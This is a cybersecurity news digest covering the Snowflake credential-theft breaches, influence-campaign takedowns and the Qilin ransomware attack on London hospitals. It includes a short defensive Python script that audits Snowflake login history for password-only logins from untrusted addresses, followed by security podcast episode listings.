Snowflake Links: The same threat actor, Sp1d3r, is also selling 3TB of data from Advance Auto Parts, allegedly breached through a Snowflake account. Other recent breaches at Santander, Ticketmaster, and QuoteWizard also link to Snowflake attacks. Source: BleepingComputer.
Credential Theft: Attackers used stolen customer credentials to target Snowflake accounts without multi-factor authentication (MFA). Mandiant linked these attacks to a financially motivated threat actor, UNC5537, who has been active since at least 2020. Source: Mandiant.
Recommendations: Ensure all accounts, particularly those related to third-party platforms, have MFA enabled. Regularly update and rotate credentials, and implement network allow lists to restrict access to trusted locations. Source: CrowdStrike, Mandiant.
Ongoing Notifications: Snowflake and Mandiant have notified around 165 organizations about potential exposure to these attacks, emphasizing the importance of cybersecurity hygiene and proactive measures. Source: Snowflake.

Google Takes Down Influence Campaigns Tied to China, Indonesia, and Russia
https://thehackernews.com/2024/06/google-takes-down-influence-campaigns.html
Google Takes Down Inauthentic Channels: Google dismantled a coordinated influence operation connected to the People's Republic of China, removing 1,320 YouTube channels and 1,177 Blogger blogs spreading content about China and U.S. foreign affairs. (Source: Google Threat Analysis Group)
Influence Operations Linked to Indonesia: Google also terminated accounts linked to two influence operations from Indonesia that supported the ruling party, further showcasing the global nature of these coordinated efforts. (Source: Google Threat Analysis Group)
Russian Influence Network Dismantled: Google removed 378 YouTube channels operated by a Russian consulting firm that spread pro-Russia and anti-Ukraine content, highlighting the ongoing digital battlegrounds. (Source: Google Threat Analysis Group)
Monetary Motives Behind Fake Content: Financial incentives drove a network linked to individuals from the Philippines and India, spreading English and Norwegian content about food, sports, and lifestyle topics. (Source: Google Threat Analysis Group)
Global Influence Campaigns: Networks from Pakistan, France, Russia, and Myanmar also faced shutdowns for spreading politically charged and nationalistic content, illustrating the diverse sources of disinformation. (Source: Google Threat Analysis Group)
Meta and OpenAI Disrupt Tel Aviv-Based Operation: Meta and OpenAI disrupted a Tel Aviv-based influence operation that targeted U.S. and Canadian audiences with content regarding the Israel-Hamas conflict. (Source: Meta via CyberScoop)
Israel's Ministry of Diaspora Affairs Linked: The New York Times reported Israel's Ministry of Diaspora Affairs funded the covert influence campaign with around $2 million, marking another instance of state-sponsored disinformation. (Source: The New York Times)
Microsoft Warns of Russian Disinformation: Microsoft warned of increasing Russian disinformation campaigns targeting the 2024 Summer Olympics in Paris, using AI-generated content to undermine the event and spread fear. (Source: Microsoft Threat Analysis Center)
Olympics as a Cyber Threat Target: Google-owned Mandiant and Recorded Future identified the Paris Olympics as a high-risk target for cyber threats, including ransomware, espionage, and hacktivist attacks, emphasizing the need for robust cybersecurity measures. (Source: Mandiant and Recorded Future)

Cyber-attack on London hospitals to take 'many months' to resolve
https://www.theguardian.com/society/article/2024/jun/11/cyber-attack-on-london-hospitals-to-take-many-months-to-resolve
Cyber-attack Impact Duration: A senior NHS source warned that the cyber-attack disrupting hospitals and GP surgeries in London may take "many months" to resolve. Key recovery factors: understanding hacker access, affected records, and data retrievability.
Scope and Perpetrators: Six NHS trusts and numerous GP practices in south-east London, serving 2 million patients, are affected. The Russian Qilin gang is believed responsible, using ransomware to lock systems and demand money for decryption keys.
Service Disruptions: A critical incident was declared due to the inability to perform non-urgent operations, including cancer procedures and planned C-sections. Blood test analysis is severely restricted, forcing rationing and cancellation of many medical procedures.
Recovery Challenges: IT systems encrypted by attackers force victims to rebuild infrastructure, even if decrypted. Former NCSC head Ciaran Martin noted that recovery from such attacks often takes weeks or months.
Mitigation Efforts: The NHS London region employs "mutual aid" by redistributing tasks to unaffected trusts to mitigate the impact on care delivery. Example: patients with heart issues transferred from affected hospitals to St George's hospital.
Leadership Insights: NHS England's chief executive, Amanda Pritchard, emphasized the vulnerability to international events and the critical, often unseen, role of pathology services.
Ongoing Threats: The Qilin gang typically also steals data, posting it on the dark web for extortion if the ransom isn't paid. No data has been posted yet.
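Both Snowflake items on this page (the June 18 briefing above and the Recommendations here) come down to the same two controls: MFA on every human account and a network policy that pins logins to known egress ranges. The following added example, which is not Mandiant's, CrowdStrike's or Snowflake's own tooling, shows the hunt a tenant can run over its own login history to find exactly the exposure the stolen infostealer credentials gave UNC5537: successful password-only logins from addresses outside the allow list. The rows are constructed to resemble a few columns of SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY, the factor values in them are illustrative, and the trusted CIDRs are assumptions.

```python
"""Audit constructed Snowflake-style login history for password-only logins
from untrusted addresses, and emit the network policy that would close them.

Added example, not Mandiant's or Snowflake's code. Rows mimic a subset of
SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY columns; values are constructed.
"""
import ipaddress
from collections import defaultdict

# Assumption: corporate egress ranges that a Snowflake network policy should allow.
TRUSTED_NETWORKS = [ipaddress.ip_network(c) for c in ("203.0.113.0/24", "198.51.100.0/24")]

# Constructed sample rows. IS_SUCCESS is the 'YES'/'NO' string the view uses.
SAMPLE_LOGINS = [
    {"USER_NAME": "ALICE", "CLIENT_IP": "203.0.113.10", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": "DUO_PUSH", "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "SNOWFLAKE_UI"},
    {"USER_NAME": "ALICE", "CLIENT_IP": "203.0.113.11", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "JDBC_DRIVER"},
    {"USER_NAME": "SVC_ETL", "CLIENT_IP": "198.51.100.5", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "PYTHON_DRIVER"},
    {"USER_NAME": "BOB", "CLIENT_IP": "192.0.2.77", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "OTHER"},
    {"USER_NAME": "BOB", "CLIENT_IP": "192.0.2.78", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "NO", "REPORTED_CLIENT_TYPE": "OTHER"},
    {"USER_NAME": "CAROL", "CLIENT_IP": "192.0.2.90", "FIRST_AUTHENTICATION_FACTOR": "OAUTH_ACCESS_TOKEN",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "SNOWFLAKE_UI"},
    {"USER_NAME": "BOB", "CLIENT_IP": "192.0.2.79", "FIRST_AUTHENTICATION_FACTOR": "PASSWORD",
     "SECOND_AUTHENTICATION_FACTOR": None, "IS_SUCCESS": "YES", "REPORTED_CLIENT_TYPE": "JDBC_DRIVER"},
]


def is_trusted(ip):
    """True if the address falls inside one of the allow-listed ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETWORKS)


def password_only(row):
    """A successful login that relied on a password and nothing else."""
    return (row["IS_SUCCESS"] == "YES"
            and row["FIRST_AUTHENTICATION_FACTOR"] == "PASSWORD"
            and row["SECOND_AUTHENTICATION_FACTOR"] is None)


def untrusted_password_logins(rows):
    """Per user: password-only logins from outside TRUSTED_NETWORKS, with the IPs and clients seen."""
    found = defaultdict(lambda: {"count": 0, "ips": set(), "clients": set()})
    for r in rows:
        if password_only(r) and not is_trusted(r["CLIENT_IP"]):
            f = found[r["USER_NAME"]]
            f["count"] += 1
            f["ips"].add(r["CLIENT_IP"])
            f["clients"].add(r["REPORTED_CLIENT_TYPE"])
    return {u: {"count": f["count"], "ips": sorted(f["ips"]), "clients": sorted(f["clients"])}
            for u, f in found.items()}


def users_without_enforced_mfa(rows):
    """Users with at least one password-only login anywhere, trusted IP or not.

    A trusted-IP hit still matters: the same credential works from anywhere
    until a network policy exists, so these users are the MFA enrolment backlog.
    """
    return sorted({r["USER_NAME"] for r in rows if password_only(r)})


def network_policy_sql(name="corp_only"):
    """Snowflake DDL that restricts account logins to TRUSTED_NETWORKS."""
    cidrs = ", ".join(f"'{net}'" for net in TRUSTED_NETWORKS)
    return (f"CREATE NETWORK POLICY {name} ALLOWED_IP_LIST = ({cidrs});\n"
            f"ALTER ACCOUNT SET NETWORK_POLICY = {name};")


if __name__ == "__main__":
    for user, f in untrusted_password_logins(SAMPLE_LOGINS).items():
        print(f"{user}: {f['count']} password-only login(s) from {f['ips']} via {f['clients']}")
    print("needs MFA enforced:", users_without_enforced_mfa(SAMPLE_LOGINS))
    print(network_policy_sql())
```

Against a real account, export LOGIN_HISTORY for the retention window and feed the rows in as dicts. Read users_without_enforced_mfa as the enrolment backlog rather than as a list of compromised users: ALICE in the sample has an MFA-backed UI session and a password-only driver session, which means MFA is not enforced on the client path she actually uses, and that path is the one a credential lifted by an infostealer walks through. Apply the generated policy to a test account first, since a wrong CIDR locks out the administrators along with the attacker.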

Cyber Security Headlines
Rural hospital support, 23andMe investigation, Snowflake breach notices

Cyber Security Headlines

Play Episode Listen Later Jun 11, 2024 7:12


Cyber assistance coming to rural hospitals. UK and Canada launch investigation into 23andMe breach. Mandiant and Snowflake sending out breach notices. Thanks to today's episode sponsor, Vanta. When it comes to ensuring your company has top-notch security practices, things can get complicated, fast. Vanta automates compliance for SOC 2, ISO 27001, and more, saving you time and money. With Vanta, you can unify your security program management and proactively manage security reviews with AI-powered security questionnaires. Our listeners get $1,000 off at vanta.com/headlines.

Today in Health IT
2 Minute Drill: Cybersecurity Updates: Ascension Event, HHS UPGRADE Program, and Retirement

Today in Health IT

Play Episode Listen Later May 24, 2024 4:17 Transcription Available


In this episode of the 2 Minute Drill, Drex covers the latest cybersecurity news in healthcare. Ascension's cyber event transparency efforts receive praise and scrutiny while facing new lawsuits. The Department of Health and Human Services launches the UPGRADE program to bolster hospital cybersecurity. Kevin Mandia, founder of Mandiant, announces his retirement. Stay informed and stay secure with these updates!
Contributions & Community: Become part of the conversation and help shape future episodes by contributing stories and insights. Visit thisweekhealth.com/news and click on "Become a Contributor."
Stay Connected: Don't miss out on our upcoming episodes focused on hacking healthcare. Follow our podcast, like and share this post to spread the word, and join the new 229 cyber and risk community for more in-depth discussions and resources.
Stay Informed, Stay Secure: Visit thisweekhealth.com/security for more information and resources to bolster your cybersecurity knowledge and defenses. Remember, stay a little paranoid.

Paul's Security Weekly
Preparation: The Less Shiny Side of Incident Response - Joe Gross - ESW #360

Paul's Security Weekly

Play Episode Listen Later May 3, 2024 117:07


It's the most boring part of incident response. Skip it at your peril, however. In this interview, we'll talk to Joe Gross about why preparing for incident response is so important. There's SO MUCH to do, we'll spend some time breaking down the different tasks you need to complete long before an incident occurs. Resources 5 Best Practices for Building a Cyber Incident Response Plan This segment is sponsored by Graylog. Visit https://securityweekly.com/graylog to learn more about them!   It's the week before RSA and the news is PACKED. Everyone is trying to get their RSA announcements out all at once. We've got announcements about funding, acquisitions, partnerships, new companies, new products, new features... To make things MORE challenging, everyone is also putting out their big annual reports, like Verizon's DBIR and Mandiant's M-Trends! Finally, we've got some great essays that are worth putting on your reading list, including a particularly fun take on the Verizon DBIR by Kelly Shortridge. Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-360

The CyberWire
Iran's covert cyber operations exposed.

The CyberWire

Play Episode Listen Later Apr 24, 2024 42:18


The DOJ indicts four Iranian nationals on hacking charges. Legislation to ban or force the sale of TikTok heads to the President's desk. A Russian hack group claims a cyberattack on an Indiana water treatment plant. A roundup of dark web data leaks. Mandiant monitors dropping dwell times. Bcrypt bogs down brute-forcing. North Korean hackers target defense secrets. On our Learning Layer segment, host Sam Meisenberg and Joe Carrigan continue their discussion of Joe's ISC2 CISSP certification journey. On our Industry Voices segment, Tony Velleca, CEO of CyberProof, joins us to explore some of the pain points that CISOs & CIOs are experiencing today, and how they can improve their cyber readiness. Ransomware may leave the shelves in Sweden's liquor stores bare.  Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guests Learning Layer On our Learning Layer segment, host Sam Meisenberg and Joe Carrigan continue their discussion of Joe's ISC2 CISSP certification journey using N2K's comprehensive CISSP training course, CISSP practice test, and CISSP practice labs. Sam and Joe discuss content and study strategies for CISSP Domain 3 Security Architecture and Engineering, and discuss encryption and non-repudiation. Specifically they cover sub-domain 3.6, "Select and determine cryptographic solutions," which includes: Cryptographic life cycle Cryptographic method Public key infrastructure (PKI). Industry Voices On our Industry Voices segment, Tony Velleca, CEO of CyberProof, joins us to explore some of the pain points that CISOs & CIOs are experiencing today, and how they can improve their cyber readiness.  
Selected Reading Rewards Up to $10 Million for Information on Iranian Hackers (GB Hackers) Congress passes bill that could ban TikTok after years of false starts (Washington Post) Russian hackers claim cyberattack on Indiana water plant (The Record) Major Data Leaks from Honda Vietnam, US Airports, and Chinese Huawei/iPhone Users (SOCRadar® Cyber Intelligence Inc.) Global attacker median dwell time continues to fall (Help Net Security) New Password Cracking Analysis Targets Bcrypt (SecurityWeek) North Korean Hackers Target Dozens of Defense Companies (Infosecurity Magazine) ​​Hackers hijack antivirus updates to drop GuptiMiner malware (Bleeping Computer) Sweden's liquor shelves to run empty this week due to ransomware attack (The Record) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc.

Daily Tech News Show
PS5 Pro Specs: Worth It? - DTNS 4750

Daily Tech News Show

Play Episode Listen Later Apr 17, 2024 31:00


We evaluate the leaked specs for Sony's upcoming PS5 Pro. Plus power demand from data centers is holding back AI development. What are the solutions? And US cybersecurity firm and Google subsidiary Mandiant said Wednesday that a hacking group with ties to the GRU was behind the January cyberattack that caused a tank at a water facility in Muleshoe, TX, to overflow. Starring Tom Merritt, Sarah Lane, Scott Johnson, Roger Chang, Joe. Link to the Show Notes.

Daily Tech News Show (Video)
PS5 Pro Specs: Worth It? – DTNS 4750

Daily Tech News Show (Video)

Play Episode Listen Later Apr 17, 2024 31:01


We evaluate the leaked specs for Sony's upcoming PS5 Pro. Plus power demand from data centers is holding back AI development. What are the solutions? And US cybersecurity firm and Google subsidiary Mandiant said Wednesday that a hacking group with ties to the GRU was behind the January cyberattack that caused a tank at a water facility in Muleshoe, TX, to overflow. Starring Tom Merritt, Sarah Lane, Scott Johnson, Roger Chang, Joe. Show notes are on the episode page. Support the show on Patreon by becoming a supporter.

The CyberWire
Protecting American data.

The CyberWire

Play Episode Listen Later Feb 28, 2024 37:00 Very Popular


President Biden is set to sign an executive order restricting overseas sharing by data brokers. US Federal agencies warn of exploited Ubiquiti EdgeRouters. A new ransomware operator claims to have hacked Epic Games. A cross-site scripting issue leaves millions of Wordpress sites vulnerable. The Rhysida ransomware group posts a multi-million dollar ransom demand on a Children's Hospital in Chicago. Mandiant tracks Chinese threat actors targeting Ivanti VPNs. The former head of DHS weighs in on a federal cyber insurance backstop. Domain Registrars offer bulk name blocking for brands. Our guest is Magpie Graham, Principal Adversary Hunter Technical Director at Dragos, reviews the key findings of Dragos' Cybersecurity Year in Review report. Cameo celebrities are taken out of context for political gains. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Guest Magpie Graham, Principal Adversary Hunter Technical Director at Dragos, reviews the key findings of Dragos' Cybersecurity Year in Review report. You can download a copy of the report here. To hear the full interview with Magpie, check out Control Loop.  
Selected Reading Biden Executive Order Targets Bulk Data Transfers to China (GovInfo Security) FBI Alert: Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation (HACKREAD) Fortnite game developer Epic Games allegedly hacked (Cyber Daily) LiteSpeed Cache Plugin XSS Flaw Exposes 4M+ Million Sites to Attack (Cyber Security News) Ransomware gang seeks $3.4 million after attacking children's hospital (The Record) Chinese Cyberspies Use New Malware in Ivanti VPN Attacks (SecurityWeek) A Cyber Insurance Backstop (Schneier on Security) Cyberwar Podcast with Kate and Alex - Special Guest Michael Chertoff  Registrars can now block all domains that resemble brand names (BleepingComputer) Cameo is being used for political propaganda — by tricking the stars involved (NPR) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.  Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

The CyberWire
Unveiling the Shadow Strike: A zero-day assault on Ivanti VPN users.

The CyberWire

Jan 11, 2024 | 32:52


A zero-day hits Ivanti VPN customers. CISA highlights an actively exploited Microsoft SharePoint Server flaw. Cisco patches a critical vulnerability. Atomic Stealer gets updates. Sensitive school emergency planning documents are exposed online. The FCC reports on risky communications equipment. The White House will introduce new cybersecurity requirements for hospitals. Mandiant explains the hack of its X (Twitter) account. Our guest is Palo Alto Networks Unit 42's David Moulton, host of the new Threat Vector podcast. And we are shocked - shocked! - to learn that an online sex-for-money scheme is a scam.

CyberWire Guest
David Moulton from Palo Alto Networks joins us to talk about Threat Vector. It's Unit 42's segment turned podcast on the N2K media network.

Selected Reading
Ivanti customers urged to patch vulnerabilities allegedly exploited by Chinese state hackers (The Record)
CISA Urges Patching of Exploited SharePoint Server Vulnerability (SecurityWeek)
Critical Cisco Unity Connection flaw gives attackers root privileges. Patch now! (CVE-2024-20272) (Help Net Security)
Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload (The Hacker News)
FCC's Reimbursement Program shows progress in removing national security risks from communication networks (Industrial Cyber)
After Barrage of Hacks, Hospitals Will Face New Federal Cybersecurity Rules Tied to Funding (The Messenger)
US School Shooter Emergency Plans Exposed in a Highly Sensitive Database Leak (WIRED)
Mandiant's X Account Was Hacked in Brute-Force Password Attack (Infosecurity Magazine)
Believing they would be paid a fortune for having sex with women, hundreds of Indian men scammed out of cash (Graham Cluley)

The CyberWire
Russian hackers hide in Ukraine telecoms for months.

The CyberWire

Jan 4, 2024 | 32:00


Sandworm was in Kyivstar's networks for months. Museums face online outages. Emsisoft suggests a ransomware payment ban. An ambulance service suffers a data breach. Mandiant's social media account gets hacked. GXC Team's latest offerings in the C2C underground market. 23andMe blames its breach on password reuse. Lawyers are using outdated encryption. On today's Threat Vector segment, David Moulton chats with Garrett Boyd, senior consultant at Palo Alto Networks Unit 42, about the importance of internal training and mentorship in cybersecurity. And in Russia, holiday cheers turn to political jeers.

CyberWire Guest
Today's Threat Vector segment with David Moulton features Garrett Boyd, a senior consultant at Unit 42 by Palo Alto Networks with a background as a Marine and professor, who discusses the importance of internal training and mentorship in cybersecurity. He provides insights into how training prepares professionals for industry challenges and how mentorship fosters professional growth and innovation. Garrett emphasizes the need for a mentorship culture in organizations and the responsibility of both mentors and mentees in this dynamic. The episode highlights the transformative impact of mentorship through personal experiences and concludes with an invitation for listeners to share their stories and a reminder to stay vigilant in the digital world.

Threat Vector
To learn what is top of mind each month from the experts at Unit 42, sign up for their Threat Intel Bulletin.

Selected Reading
Compromised accounts and C2C markets. Cyberespionage and state-directed hacktivism. (CyberWire)
Exclusive: Russian hackers were inside Ukraine telecoms giant for months (Reuters)
Hackers linked to Russian spy agency claim cyberattack on Ukrainian cell network (Reuters)
Museum World Hit by Cyberattack on Widely Used Software (The New York Times)
The State of Ransomware in the U.S.: Report and Statistics 2023 (Emsisoft)
Nearly 1 million affected by ambulance service data breach (The Record)
Mandiant's account on X hacked to push cryptocurrency scam (Bleeping Computer)
Cybercriminals Implemented Artificial Intelligence (AI) For Invoice Fraud (Resecurity)
23andMe tells victims it's their fault that their data was breached (TechCrunch+)
The Curious Case of MD5 (katelynsills)
Firmware prank causes LED curtain in Russia to display ‘Slava Ukraini’ — police arrest apartment owner (The Record)